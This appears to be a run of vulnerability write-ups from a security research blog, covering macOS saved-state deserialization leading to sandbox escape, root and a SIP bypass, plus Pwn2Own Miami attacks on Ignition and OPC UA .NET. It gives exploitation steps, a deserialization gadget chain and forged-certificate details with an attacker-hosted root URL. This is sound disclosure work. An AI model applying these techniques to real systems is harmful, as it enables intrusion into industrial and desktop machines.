00000120  65 ba c4 40 ad db e3 62  55 59 9a 29 46 2e 6c 07  |[email protected].)F.l.|
00000130  34 68 e9 00 89 15 37 1c  ff c8 a5 d8 7c 8d b2 f0  |4h....7.....|...|
00000140  4b c3 26 f9 91 f8 c4 2d  12 4a 09 ba 26 1d 00 13  |K.&....-.J..&...|
00000150  65 ac e7 66 80 c0 e2 55  ec 9a 8e 09 cb 39 26 d4  |e..f...U.....9&.|
00000160  c8 15 94 d8 2c 8b fa 79  5f 62 18 39 f0 a5 df 0b  |....,..y_b.9....|
00000170  3d a4 5c bc 30 d5 2b cc  08 88 c8 49 d6 ab c0 e1  |=.\.0.+....I....|
00000180  c1 e5 41 eb 3e 2b 17 80  c4 01 64 3d 79 be 82 aa  |..A.>+....d=y...|
00000190  3d 56 8d bb e5 7a ea 89  0f 4c dc 16 03 e9 2a d8  |=V...z...L....*.|
000001a0  c5 3e 25 ed c2 4b 65 da  8a d9 0d d9 23 92 fd 06  |.>%..Ke.....#...|

Whenever an application is launched, AppKit will read these files and restore the windows of the application. This happens automatically, without the app needing to implement anything. The code for reading these files is quite careful: if the application crashed, then maybe the state is corrupted too. If the application crashes while restoring the state, then the next time the state is discarded and it does a fresh start.

The vulnerability we found is that the encrypted serialized object stored in the file was not using “secure coding”. To explain what that means, we’ll first explain serialization vulnerabilities, in particular on macOS.

Serialized objects

Many object-oriented programming languages have added support for binary serialization, which turns an object into a bytestring and back. Contrary to XML and JSON, these are custom, language specific formats. In some programming languages, serialization support for classes is automatic, in other languages classes can opt-in.

In many of those languages these features have lead to vulnerabilities. The problem in many implementations is that an object is created first, and then its type is checked. Methods may be called on these objects when creating or destroying them. By combining objects in unusual ways, it is sometimes possible to gain remote code execution when a malicious object is deserialized. It is, therefore, not a good idea to use these serialization functions for any data that might be received over the network from an untrusted party.

For Python pickle and Ruby Marshall.load remote code execution is straightforward. In Java ObjectInputStream.readObject and C#, RCE is possible if certain commonly used libraries are used. The ysoserial and tools can be used to generate a payload depending on the libraries in use. In PHP, exploitability for RCE is rare.

Objective-C serialization

In Objective-C, classes can implement the NSCoding protocol to be serializable. Subclasses of NSCoder, such as NSKeyedArchiver and NSKeyedUnarchiver, can be used to serialize and deserialize these objects.

How this works in practice is as follows. A class that implements NSCoding must include a method:

- (id)initWithCoder:(NSCoder *)coder;

In this method, this object can use coder to decode its instance variables, using methods such as -decodeObjectForKey:, -decodeIntegerForKey:, -decodeDoubleForKey:, etc. When it uses -decodeObjectForKey:, the coder will recursively call -initWithCoder: on that object, eventually decoding the entire graph of objects.

Apple has also realized the risk of deserializing untrusted input, so in 10.8, the NSSecureCoding protocol was added. The documentation for this protocol states:

A protocol that enables encoding and decoding in a manner that is robust against object substitution attacks.

This means that instead of creating an object first and then checking its type, a set of allowed classes needs to be included when decoding an object.

So instead of the unsafe construction:

id obj = [decoder decodeObjectForKey:@"myKey"];
if (![obj isKindOfClass:[MyClass class]]) { /* */ }

The following must be used:

id obj = [decoder decodeObjectOfClass:[MyClass class] forKey:@"myKey"];

This means that when a secure coder is created, -decodeObjectForKey: is no longer allowed, but -decodeObjectOfClass:forKey: must be used.

That makes exploitable vulnerabilities significantly harder, but it could still happen. One thing to note here is that subclasses of the specified class are allowed. If, for example, the NSObject class is specified, then all classes implementing NSCoding are still allowed. If only NSDictionary are expected and an imported framework contains a rarely used and vulnerable subclass of NSDictionary, then this could also create a vulnerability.

In all of Apple’s operating systems, these serialized objects are used all over the place, often for inter-process exchange of data. For example, NSXPCConnection heavily relies on secure serialization for implementing remote method calls. In iMessage, these serialized objects are even exchanged with other users over the network. In such cases it is very important that secure coding is always enabled.

Creating a malicious serialized object

In the file for saved states, objects were stored using an NSKeyedArchiver without secure coding enabled. This means we could include objects of any class that implements the NSCoding protocol. The likely reason for this is that applications can extend the saved state with their own objects, and because the saved state functionality is older than NSSecureCoding, Apple couldn’t just upgrade this to secure coding, as this could break third-party applications.

To exploit this, we wanted a method for constructing a chain of objects that could allows us to execute arbitrary code. However, no project similar to ysoserial for Objective-C appears to exist and we could not find other examples of abusing insecure deserialization in macOS. In Remote iPhone Exploitation Part 1: Poking Memory via iMessage and CVE-2019-8641 Samuel Groß of Google Project Zero describes an attack against a secure coder by abusing a vulnerability in NSSharedKeyDictionary, an uncommon subclass of NSDictionary. As this vulnerability is now fixed, we couldn’t use this.

By decompiling a large number of -initWithCoder: methods in AppKit, we eventually found a combination of 2 objects that we could use to call arbitrary Objective-C methods on another deserialized object.

We start with NSRuleEditor. The -initWithCoder: method of this class creates a binding to an object from the same archive with a key path also obtained from the archive.

Bindings are a reactive programming technique in Cocoa. It makes it possible to directly bind a model to a view, without the need for the boilerplate code of a controller. Whenever a value in the model changes, or the user makes a change in the view, the changes are automatically propagated.

A binding is created calling the method:

- (void)bind:(NSBindingName)binding 
 withKeyPath:(NSString *)keyPath 
     options:(NSDictionary<NSBindingOption, id> *)options;

This binds the property binding of the receiver to the keyPath of observable. A keypath a string that can be used, for example, to access nested properties of the object. But the more common method for creating bindings is by creating them as part of a XIB file in Xcode.

For example, suppose the model is a class Person, which has a property @property (readwrite, copy) NSString *name;. Then you could bind the “value” of a text field to the “name” keypath of a Person to create a field that shows (and can edit) the person’s name.

In the XIB editor, this would be created as follows:

The different options for what a keypath can mean are actually quite complicated. For example, when binding with a keypath of “foo”, it would first check if one the methods getFoo, foo, isFoo and _foo exists. This would usually be used to access a property of the object, but this is not required. When a binding is created, the method will be called immediately when creating the binding, to provide an initial value. It does not matter if that method actually returns void. This means that by creating a binding during deserialization, we can use this to call zero-argument methods on other deserialized objects!

ID NSRuleEditor::initWithCoder:(ID param_1,SEL param_2,ID unarchiver)

	id arrayOwner = [unarchiver decodeObjectForKey:@"NSRuleEditorBoundArrayOwner"];


	if (arrayOwner) {
	  keyPath = [unarchiver decodeObjectForKey:@"NSRuleEditorBoundArrayKeyPath"];
	  [self bind:@"rows" toObject:arrayOwner withKeyPath:keyPath options:nil];


In this case we use it to call -draw on the next object.

The next object we use is an NSCustomImageRep object. This obtains a selector (a method name) as a string and an object from the archive. When the -draw method is called, it invokes the method from the selector on the object. It passes itself as the first argument:

ID NSCustomImageRep::initWithCoder:(ID param_1,SEL param_2,ID unarchiver)
	id drawObject = [unarchiver decodeObjectForKey:@"NSDrawObject"];
	self.drawObject = drawObject;
	id drawMethod = [unarchiver decodeObjectForKey:@"NSDrawMethod"];
	SEL selector = NSSelectorFromString(drawMethod);
	self.drawMethod = selector;


void ___24-[NSCustomImageRep_draw]_block_invoke(long param_1)
  [self.drawObject performSelector:self.drawMethod withObject:self];

By deserializing these two classes we can now call zero-argument methods and multiple argument methods, although the first argument will be an NSCustomImageRep object and the remaining arguments will be whatever happens to still be in those registers. Nevertheless, is a very powerful primitive. We’ll cover the rest of the chain we used in a future blog post.


Sandbox escape

First of all, we escaped the Mac Application sandbox with this vulnerability. To explain that, some more background on the saved state is necessary.

In a sandboxed application, many files that would be stored in ~/Library are stored in a separate container instead. So instead of saving its state in:

~/Library/Saved Application State/<Bundle ID>.savedState/

Sandboxed applications save their state to:

~/Library/Containers/<Bundle ID>/Data/Library/Saved Application State/<Bundle ID>.savedState/

Apparently, when the system is shut down while an application is still running (when the prompt is shown asking the user whether to reopen the windows the next time), the first location is symlinked to the second one by talagent. We are unsure of why, it might have something to do with upgrading an application to a new version which is sandboxed.

Secondly, most applications do not have access to all files. Sandboxed applications are very restricted of course, but with the addition of TCC even accessing the Downloads, Documents, etc. folders require user approval. If the application would open an open or save panel, it would be quite inconvenient if the user could only see the files that that application has access to. To solve this, a different process is launched when opening such a panel: Even though the window itself is part of the application, its contents are drawn by openAndSavePanelService. This is an XPC service which has full access to all files. When the user selects a file in the panel, the application gains temporary access to that file. This way, users can still browse their entire disk even in applications that do not have permission to list those files.

As it is an XPC service with service type Application, it is launched separately for each app.

What we noticed is that this XPC Service reads its saved state, but using the bundle ID of the app that launched it! As this panel might be part of the saved state of multiple applications, it does make some sense that it would need to separate its state per application.

As it turns out, it reads its saved state from the location outside of the container, but with the application’s bundle ID:

~/Library/Saved Application State/<Bundle ID>.savedState/

But as we mentioned if the app was ever open when the user shut down their computer, then this will be a symlink to the container path.

Thus, we can escape the sandbox in the following way:

  1. Wait for the user to shut down while the app is open, if the symlink does not yet exist.
  2. Write malicious and windows.plist files inside the app’s own container.
  3. Open an NSOpenPanel or NSSavePanel.

The process will now deserialize the malicious object, giving us code execution in a non-sandboxed process.

This was fixed earlier than the other issues, as CVE-2021-30659 in macOS 11.3. Apple addressed this by no longer loading the state from the same location in

Privilege escalation

By injecting our code into an application with a specific entitlement, we can elevate our privileges to root. For this, we could apply the technique explained by A2nkF in Unauthd - Logic bugs FTW.

Some applications have an entitlement of containing the value This means that this application is allowed to install packages that have a signature generated by Apple without authorization from the user. For example, “Install Command Line Developer” and “Bootcamp” have this entitlement. A2nkF also found a package signed by Apple that contains a vulnerability: macOSPublicBetaAccessUtility.pkg. When this package is installed to a specific disk, it will run (as root) a post-install script from that disk. The script assumes it is being installed to a disk containing macOS, but this is not checked. Therefore, by creating a malicious script at the same location it is possible to execute code as root by installing this package.

The exploitation steps are as follows:

  1. Create a RAM disk and copy a malicious script to the path that will be executed by macOSPublicBetaAccessUtility.pkg.
  2. Inject our code into an application with the entitlement containing by creating the windows.plist and files for that application and then launching it.
  3. Use the injected code to install the macOSPublicBetaAccessUtility.pkg package to the RAM disk.
  4. Wait for the post-install script to run.

In the writeup from A2nkF, the post-install script ran without the filesystem restrictions of SIP. It inherited this from the installation process, which needs it as package installation might need to write to SIP protected locations. This was fixed by Apple: post- and pre-install scripts are no longer SIP exempt. The package and its privilege escalation can still be used, however, as Apple still uses the same vulnerable installer package.

SIP filesystem bypass

Now that we have escaped the sandbox and elevated our privileges to root, we did want to bypass SIP as well. To do this, we looked around at all available applications to find one with a suitable entitlement. Eventually, we found something on the macOS Big Sur Beta installation disk image: “macOS Update” has the entitlement. This means that this process can write to all SIP protected locations (and it is heritable, which is convenient because we can just spawn a shell). Although it is supposed to be used only during the beta installation, we can just copy it to a normal macOS environment and run it there.

The exploitation for this is quite simple:

  1. Create malicious windows.plist and files for “macOS Update”.
  2. Launch “macOS Update”.

When exempt from SIP’s filesystem restrictions, we can read all files from protected locations, such as the user’s mailbox. We can also modify the TCC database, which means we can grant ourselves permission to access the webcam, microphone, etc. We could also persist our malware on locations which are protected by SIP, making it very difficult to remove by anyone other than Apple. Finally, we can change the database of approved kernel extensions. This means that we could load a new kernel extension silently, without user approval. When combined with a vulnerable kernel extension (or a codesigning certificate that allows signing kernel extensions), we would have been able to gain kernel code execution, which would allow disabling all other restrictions too.


We recorded the following video to demonstrate the different steps. It first shows that the application “Sandbox” is sandboxed, then it escapes its sandbox and launches “Privesc”. This elevates privileges to root and launches “SIP Bypass”. Finally, this opens a reverse shell that is exempt from SIP’s filesystem restrictions, which is demonstrated by writing a file in /var/db/SystemPolicyConfiguration (the location where the database of approved kernel modules is stored):

The fix

Apple first fixed the sandbox escape in 11.3, by no longer reading the saved state of the application in (CVE-2021-30659).

Fixing the rest of the vulnerability was more complicated. Third-party applications may store their own objects in the saved state and these objects might not support secure coding. This brings us back to the method from the introduction: -applicationSupportsSecureRestorableState:. Applications can now opt-in to requiring secure coding for their saved state by returning TRUE from this method. Unless an app opts in, it will keep allowing non-secure coding, which means process injection might remain possible.

This does highlight one issue with the current design of these security measures: downgrade attacks. The code signature (and therefore entitlements) of an application will remain valid for a long time, and the TCC permissions of an application will still work if the application is downgraded. A non-sandboxed application could just silently download an older, vulnerable version of an application and exploit that. For the SIP bypass this would not work, as “macOS Update” does not run on macOS Monterey because certain private frameworks no longer contain the necessary symbols. But that is a coincidental fix, in many other cases older applications may still run fine. This vulnerability will therefore be present for as long as there is backwards compatibility with older macOS applications!

Nevertheless, if you write an Objective-C application, please make sure you add -applicationSupportsSecureRestorableState: to return TRUE and to adapt secure coding for all classes used for your saved states!


In the current security architecture of macOS, process injection is a powerful technique. A generic process injection vulnerability can be used to escape the sandbox, elevate privileges to root and to bypass SIP’s filesystem restrictions. We have demonstrated how we used the use of insecure deserialization in the loading of an application’s saved state to inject into any Cocoa process. This was addressed by Apple as CVE-2021-30873.

  1. It is unclear what security the AES encryption here is meant to add, as the key is stored right next to it. There is no MAC, so no integrity check for the ciphertext. ↩︎

Pwn2Own Miami 2022: Inductive Automation Ignition Remote Code Execution

22 July 2022 at 00:00

This write-up is part 2 of a series of write-ups about the 5 vulnerabilities we demonstrated last April at Pwn2Own Miami. This is the write-up for a Remote Code Execution vulnerability in Inductive Automation Ignition, by using an authentication bypass (CVE-2022-35871).

Conformed! @daankeuper and @xnyhps from Computest Sector 7 (@sector7_nl) used a missing authentication for critical function vuln to execute code on Inductive Automation Ignition . They win $20,000 and 20 Master of Pwn points. #Pwn2Own #P2O

— Zero Day Initiative (@thezdi) April 19, 2022

The cause of this vulnerability was a weak authentication implementation when using Active Directory single sign-on. We combined this with intended(?) functionality that allowed us to execute Python code on the server (as SYSTEM).


Inductive Automation Ignition is an application that was part of in the “Control Server” category. Control servers are used to supervise and communicate with lower-level devices, such as PLCs. This makes them a critical element in any ICS network.

Ignition is organized in different projects, which are managed using a web interface. Each project needs a user source which determines the authentication and authorization for that project. Authentication can be internal, using a database, or based on Active Directory (which has some sub-options that determine how authorization is handled). The projects can then be used from Ignition Perspective, a desktop application which communicates with the Ignition server through the gateway API.

When one of the AD based user sources is configured, it offers an option named “SSO Enabled”.

To configure an AD based user source, the server needs to be configured with an AD account, the IP address of a domain controller and the Active Directory domain name. The AD account is used to set up an LDAP connection to the AD server for the application itself.


Auth bypass

While, looking at the decompiled Java code (Ignition/lib/core/gateway/gateway-api-8.1.16.jar) for how the SSO authentication is handled in the gateway API, we noticed that the function implementing SSO is a lot simpler than we expected.


protected AuthenticatedUser authenticateAdSso(AuthChallenge challenge) throws Exception {
    String ssoUname = (String)challenge.get(User.Username);
    String ssoDomain = (String)challenge.get(ADSSOAuthChallenge.ADDomain);
    if (StringUtils.isBlank(ssoUname)) {
      this.log.debug("SSO username is blank.");
      return null;
    if (StringUtils.isBlank(ssoDomain)) {
      this.log.debugf("SSO domain is blank for user '%s'", new Object[] { ssoUname });
      return null;
    if (ssoDomain.equalsIgnoreCase(this.domain)) {
      User existingUser = this.userSource.findSSOUser(ssoUname);
      if (existingUser != null)
        return (AuthenticatedUser)new BasicAuthenticatedUser(existingUser, new Date()); 
      this.log.debug(String.format("Existing user was not found for username '%s'", new Object[] { ssoUname }));
    } else {
      this.log.debug(String.format("SSO domains did not match! Compared '%s' and '%s'", new Object[] { this.domain, ssoDomain }));
    return null;

This function receives an AuthChallenge object (essentially a JSON dictionary). It checks that it contains a key for the username and a key for the SSO domain. Then it compares the value for the SSO domain to the configured Active Directory domain name. If it matches, it looks up the username using LDAP and, if found, returns it as an AuthenticatedUser object.

There’s no check here for a password, token, signature, or anything like that. The only data that needs to be submitted to the server is the username and the Active Directory domain name. In other words, the vulnerability here is that there is no SSO implementation at all! It’s not even clear to us what type of SSO was intended to be used here, probably Kerberos?


To go from an authenticated user to code execution, we used what we assume is intended functionality that allows us to evaluate Python on the server. There is a ScriptInvoke gateway API endpoint with an execute function. Authenticated users can submit Python code to this endpoint, which is executed on the server with the same privileges as the server (on Windows, this is SYSTEM). Ignition Designer offers the ability to execute scripts on the server in response to specific events or regular intervals. This does not appear to require any special role or permissions, so this design looks risky to us, but it does seem to function as designed.


To exploit the auth bypass, the server needs to be configured using AD authentication with SSO enabled. To perform the attack, we need the following information:

  1. The name of a project using this authentication method.
  2. The name of an existing AD user.
  3. The name of the AD domain.

It turns out that the first two were easy to do. There is an unauthenticated API endpoint on the admin interface returning the list of all projects:

http://<server IP>/data/perspective/projects

For the username, this simply had to be any existing AD user, regardless of permissions in AD or Ignition. So, we could just use “Administrator”, as that user will always exist in AD.

This only leaves the AD domain name, which we didn’t find a way to obtain automatically from Ignition. In practice, that value should be easy to obtain when attacking a company, especially if the attacker is already on the company’s internal network. In most cases this would just be the company’s primary domain name, or the value might leak in email headers, file metadata, etc.

Finally, we used a reverse shell implemented in Python to setup a connection back to our attacker machine.


Exploiting these vulnerabilities would grant us code execution on the machine hosting Ignition. This means that we could immediately manipulate or disrupt any process handled by or via this server. For example, we might be able to take over the communication with PLCs. In addition, the SYSTEM privileges would make it a fantastic starting point for further attacks other parts of the ICS or IT network.

In most cases, the Ignition server will not be exposed publicly to the internet, but only available on the internal ICS network. Therefore, this vulnerability would need to be combined with different vulnerabilities or attacks that grant us access to that network.

The fix

This vulnerability was addressed by Inductive Automation in versions 8.1.17 and 7.9.20 and assigned CVE-2022-35871. AD User Sources now disable the “SSO Enabled” setting automatically, unless a specific flag is set on the server (-Dignition.enableInsecureAdSso=true). In other words, Inductive Automation has chosen to deprecate this feature and documented that it is dangerous to use. This may seem like a disappointing fix, but implementing a secure SSO protocol would likely have taken a lot more time. This way the vulnerability can be avoided and, if desired, Inductive Automation could implement a secure SSO protocol without time pressure.


When implementing security critical features (such as authentication), it is important to make a good design first. When authentication is combined with single sign-on and native applications this is even more important, as it can become very complex. With such a design, it becomes possible to catch mistakes before the features are implemented and to test each part separately.

While we of course don’t know how this feature was built, we suspect no such design was created. Having a cryptographic protocol like Kerberos completely missing from the implementation should be quite obvious if the feature had been fully designed first.

Features allowing users to execute their own code on a server can be required in certain use-cases. However, the fact that this was available for a user who did not have any permissions or roles explicitly assigned to them is worrisome. This means that any authentication bypass immediately becomes an RCE vulnerability.


We’ve demonstrated a remote code execution vulnerability against Inductive Automation Ignition. We found that authentication can be bypassed on a server with AD single sign-on enabled. The (cryptographic) protocol for handling single sign-on appears to not be implemented at all.

After bypassing the authentication, we used functionality of the server to execute arbitrary Python code with SYSTEM privileges to set up a reverse shell.

Big shout-out to Inductive Automation on handling this years edition of Pwn2Own! They published all details of all findings on their website, including a extensive write-up of their thoughts and fixes. Well done!

We thank Zero Day Initiative for organizing this years edition of Pwn2Own Miami, we hope to return to a later edition!

You can find the other four write-ups here:

Pwn2Own Miami 2022: OPC UA .NET Standard Trusted Application Check Bypass

19 July 2022 at 00:00

This write-up is part 1 of a series of write-ups about the 5 vulnerabilities we demonstrated last April at Pwn2Own Miami. This is the write-up for the Trusted Application Check Bypass in the OPC Foundation’s OPC UA .NET Standard (CVE-2022-29865).

Wow - confirmed! With one of the more interesting bugs we've seen at #Pwn2Own, @daankeuper and @xnyhps from @sector7_nl bypassed the trusted application check on the OPC Foundation OPC UA .NET Standard. The earn $40,000 and 40 Master of Pwn points. #P2OMiami

— Zero Day Initiative (@thezdi) April 20, 2022

OPC UA is a communication protocol used in the ICS world. It is an open standard developed by the OPC Foundation. Because it is implemented by many vendors, it is often the preferred protocol for setting up communication between systems from different vendors in an ICS network.

The security for OPC UA connections can be configured in three different ways: without any security, only signing and signing and encryption. In the latter two cases, both endpoints authenticate to each other using X.509 certificates. While these are the same type of certificates as used in TLS, the encryption protocol itself is custom and not based on TLS.

At Pwn2Own Miami 2022, four OPC UA servers were in scope, with three different “payload” options:

  • Denial-of-Service. Availability is everything in an ICS network, so being able to crash an OPC UA server can have significant impact.
  • Remote code execution. Being able to take over the server.
  • Bypass Trusted Application Check. Setting up a trusted connection to a server without having a valid certificate.

Of course, with a pre-authentication RCE it would be possible to modify the configuration of the server to change the security level and bypass the trusted application check that way, but this was not allowed.

OPC UA .NET Standard

We looked at potential trusted certificate bypasses in all four servers in scope, we only found one in the server OPC UA .NET Standard. This server is used as a reference implementation for OPC UA in C# and is open source, meaning that this bypass could affect many ICS products that incorporate it as a library.

The core of the issue is in the function InternalValidate in CertificateValidator.cs. The logic for verifying a certificate here is quite complicated, which likely contributed to a bug like this to be missed.

What we heard from the OPC Foundation is that the reason this check is so complicated is that they do not want to use the built-in certificate store of Windows. Instead, the certificates of the application can be managed by placing the certificate files in a specific directory on the server. The OPC UA specification has such a high level of detail that it even suggests how to store those certificates.

The core issue here is that two different certificate chains are built without verifying that they are equal. By crafting a chain in a very specific way, it is possible to make the server accept it, even though it is not signed by a trusted root.

862protected virtual async Task InternalValidate(X509Certificate2Collection certificates, ConfiguredEndpoint endpoint)
864    X509Certificate2 certificate = certificates[0];
866    // check for previously validated certificate.
867    X509Certificate2 certificate2 = null;
869    if (m_validatedCertificates.TryGetValue(certificate.Thumbprint, out certificate2))
870    {
871        if (Utils.IsEqual(certificate2.RawData, certificate.RawData))
872        {
873            return;
874        }
875    }
877    CertificateIdentifier trustedCertificate = await GetTrustedCertificate(certificate).ConfigureAwait(false);
879    // get the issuers (checks the revocation lists if using directory stores).
880    List<CertificateIdentifier> issuers = new List<CertificateIdentifier>();
881    Dictionary<X509Certificate2, ServiceResultException> validationErrors = new Dictionary<X509Certificate2, ServiceResultException>();
883    bool isIssuerTrusted = await GetIssuersNoExceptionsOnGetIssuer(certificates, issuers, validationErrors).ConfigureAwait(false);
885    ServiceResult sresult = PopulateSresultWithValidationErrors(validationErrors);
887    // setup policy chain
888    X509ChainPolicy policy = new X509ChainPolicy();
889    policy.RevocationFlag = X509RevocationFlag.EntireChain;
890    policy.RevocationMode = X509RevocationMode.NoCheck;
891    policy.VerificationFlags = X509VerificationFlags.NoFlag;
893    foreach (CertificateIdentifier issuer in issuers)
894    {
895        if ((issuer.ValidationOptions & CertificateValidationOptions.SuppressRevocationStatusUnknown) != 0)
896        {
897            policy.VerificationFlags |= X509VerificationFlags.IgnoreCertificateAuthorityRevocationUnknown;
898            policy.VerificationFlags |= X509VerificationFlags.IgnoreCtlSignerRevocationUnknown;
899            policy.VerificationFlags |= X509VerificationFlags.IgnoreEndRevocationUnknown;
900            policy.VerificationFlags |= X509VerificationFlags.IgnoreRootRevocationUnknown;
901        }
903        // we did the revocation check in the GetIssuers call. No need here.
904        policy.RevocationMode = X509RevocationMode.NoCheck;
905        policy.ExtraStore.Add(issuer.Certificate);
906    }
908    // build chain.
909    using (X509Chain chain = new X509Chain())
910    {
911        chain.ChainPolicy = policy;
912        chain.Build(certificate);
914        // check the chain results.
915        CertificateIdentifier target = trustedCertificate;
917        if (target == null)
918        {
919            target = new CertificateIdentifier(certificate);
920        }
922        for (int ii = 0; ii < chain.ChainElements.Count; ii++)
923        {
924            X509ChainElement element = chain.ChainElements[ii];
926            CertificateIdentifier issuer = null;
928            if (ii < issuers.Count)
929            {
930                issuer = issuers[ii];
931            }
933            // check for chain status errors.
934            if (element.ChainElementStatus.Length > 0)
935            {
936                foreach (X509ChainStatus status in element.ChainElementStatus)
937                {
938                    ServiceResult result = CheckChainStatus(status, target, issuer, (ii != 0));
939                    if (ServiceResult.IsBad(result))
940                    {
941                        sresult = new ServiceResult(result, sresult);
942                    }
943                }
944            }
946            if (issuer != null)
947            {
948                target = issuer;
949            }
950        }
951    }

First, on line 883, GetIssuersNoExceptionsOnGetIssuer is used to construct a certificate chain for the to be validated certificate (the out variable issuers). This function works in a loop. In each iteration, it attempts to find the issuer of the current certificate. For this it consults the following locations:

  1. The list of trusted certificates stored on the server. If it is found in this list, the function will return true.
  2. The list of issuer certificates stored on the server. These certificates are not explicitly trusted, but can be used to construct a chain to a trusted root.
  3. The list of additional certificates sent by the client. Just like in TLS, it is possible to include additional certificates in the OPC UA handshake.

If an issuer is found, it becomes the current certificate and the loop will continue until the current certificate is self-signed or an issuer can not be found.

To find the issuer of a certificate, the function Match is used. This function compares the issuer name of the certificate with the subject name of each potential issuer. Additionally, the serial number or the subject key identifier must match. Note that the cryptographic signature is not yet considered at this stage, the match is therefore only based on forgeable certificate metadata.

The comparison of the names in Match is implemented in CompareDistinguishedName, but this implementation is unusual. This function decomposes the name into components and then does a case-insensitive match on each component. This is not how most implementations compare X.509 names.

Next up, on line 912 an X509Chain object is used. The intent here appears to be to verify that the chain built using GetIssuersNoExceptionsOnGetIssuer is cryptographically valid. However, because it is not configured with the root certificates used by the application, it will often result in errors. Thus, on line 938, the function CheckChainStatus is used to ignore certain types of errors. For example, an UntrustedRoot error is ignored if it occurred for the certificate at the root.

The vulnerability that we found is that there is no verification that the certificate chain built by GetIssuersNoExceptionsOnGetIssuer and the one built by X509Chain.Build are equal. By abusing the unusual name comparison it is possible to construct a certificate such that both functions will result in a different chain. By making sure that the errors in the second chain only occur where CheckChainStatus ignores them, it is possible for this certificate to get accepted by the server.

The only prerequisite for this attack is that we know the subject name of one of the trusted root certificates and either its serial number or subject key identifier. Because certificates are not secret, these values should be easy to obtain in practice. During the demonstration, we ran the attack against a server which itself has a certificate issued by a trusted root certificate. That certificate gives us the metadata we need. In practice this should work quite often.



Suppose the server is configured to trust a certificate with the following details:

        Version: 3 (0x2)
        Serial Number: 9891791597891487306 (0x8946b40ca084064a)
    Signature Algorithm: sha1WithRSAEncryption
        Issuer: CN=Root
            Not Before: Feb 24 09:35:53 2022 GMT
            Not After : Feb 24 09:35:53 2023 GMT
        Subject: CN=Root
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (2048 bit)
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Authority Key Identifier:

            X509v3 Basic Constraints:
            X509v3 Key Usage:
                Certificate Sign, CRL Sign
    Signature Algorithm: sha1WithRSAEncryption

And suppose that the OPC server itself is configured with the following certificate, issued from this root:

        Version: 3 (0x2)
        Serial Number:
    Signature Algorithm: sha1WithRSAEncryption
        Issuer: CN=Root
            Not Before: Feb 24 09:35:53 2022 GMT
            Not After : Mar 26 09:35:53 2022 GMT
        Subject: CN=Quickstart Reference Server, C=US, ST=Arizona, O=OPC Foundation, DC=opcserver
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (2048 bit)
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Authority Key Identifier:

            X509v3 Basic Constraints:
            X509v3 Key Usage:
                Digital Signature, Key Encipherment, Data Encipherment, Key Agreement
            X509v3 Subject Alternative Name:
                DNS:opcserver, URI:URI:urn:opcserver
    Signature Algorithm: sha1WithRSAEncryption

Then the attacker can connect to the server to obtain this certificate and use the data in the Issuer and X509v3 Authority Key Identifier fields to craft two new certificates.

First of all, the attacker generates a new root certificate which uses the same common name as the trusted root certificate, but where each letter is flipped in case (i.e.: upper case to lower case and lower case to upper case). This certificate is self-signed and must contain the CA=TRUE basic constraint. The attacker makes this certificate available for download as a PEM file over HTTP on a webserver at the URL http://attacker/root.pem.

        Version: 3 (0x2)
        Serial Number:
    Signature Algorithm: sha256WithRSAEncryption
        Issuer: CN=rOOT
            Not Before: Feb 17 10:40:24 2022 GMT
            Not After : May 25 10:40:24 2022 GMT
        Subject: CN=rOOT
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (3072 bit)
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Basic Constraints:
            X509v3 Key Usage:
                Digital Signature, Non Repudiation, Key Encipherment, Data Encipherment, Key Agreement, Certificate Sign, CRL Sign
    Signature Algorithm: sha256WithRSAEncryption

Secondly, the attacker generates a new leaf certificate, signed using the previously created root. The following fields are added to this certificate:

  • The issuer contains the subject name of the fake root.
  • The X509v3 Authority Key Identifier extension contains a directory name of the fake root and a serial number of the real trusted root.
  • The certificate contains an Authority Information Access extension containing a CA Issuers field containing the URL where the fake root certificate PEM file can be downloaded.

All other fields, like the Subject and Subject Alternative Name fields, can contain any data the attacker may choose. To pass all further checks in InternalValidate, the validity time should contain the current time and the keyUsage field should contain Data Encipherment. A Subject Alternative Name extension could be added if the domain is checked.

        Version: 3 (0x2)
        Serial Number:
    Signature Algorithm: sha256WithRSAEncryption
        Issuer: CN=rOOT
            Not Before: Feb 17 10:40:24 2022 GMT
            Not After : May 25 10:40:24 2022 GMT
        Subject: CN=FakeCert
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (3072 bit)
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Authority Key Identifier:

            X509v3 Basic Constraints:
            Authority Information Access:
                CA Issuers - URI:http://attacker/root.pem

            X509v3 Key Usage:
                Digital Signature, Non Repudiation, Key Encipherment, Data Encipherment, Key Agreement, Certificate Sign, CRL Sign
    Signature Algorithm: sha256WithRSAEncryption


When the attacker connects with this CN=FakeCert certificate, the following will happen:

GetIssuersNoExceptionsOnGetIssuer will look in its trusted certificate store for the issuer of this certificate. To do this, it compares the Issuer name of the received certificate with the Subject name of the certificates in the store.

It does this check by decomposing the distinguished name, sorting the components, and then doing a case-insensitive match on each component.

So, it compares the common name of the issuer from the certificate:


with the common name of the subject of the trusted certificate:


In addition, it will compare the serial number of the root certificate with the serial number of the authority key identifier extension, which are equal:

Serial Number: 9891791597891487306 (0x8946b40ca084064a)
X509v3 Authority Key Identifier:

This function will therefore consider the CN=Root certificate a match. The signature could show that it is not correctly signed, but this is not checked yet. It will obtain a chain with one issuer and isIssuerTrusted will be true.

Then, it creates an X509Chain object and calls chain.Build(certificate). The result code of this call is ignored, and the global status of the result too. Only the statuses of the individual chain elements are checked.

As chain.Build does a literal comparison on the subject of the trusted root with the issuer of FakeCert, it will not consider the CN=Root certificate to be the issuer of FakeCert (because it looks for CN=rOOT). While the serial number from the Authority Key Identifier extension matches, this is not sufficient for a match.

Because it can’t find the issuer certificate in its trust store, it will use the CA Issuers URL from the Authority Information Access extension to download the certificate from the webserver. With that, the result of the chain.Build() call will be a chain of two certificates, where the second one indicates the error UntrustedRoot. The function CheckChainStatus ignores this error code because it incorrectly assumes that the corresponding certificate was one of its trusted certificates, but it will in fact be the CN=rOOT certificate.

The remainder of the checks in InternalValidate will now succeed, because issuedByCA is true and isIssuerTrusted is true. The key usage, endpoint domain, use of SHA1 and minimum key size checks can be passed because the attacker has full control over the contents of FakeCert.

Our exploit can been seen in action in the video below:


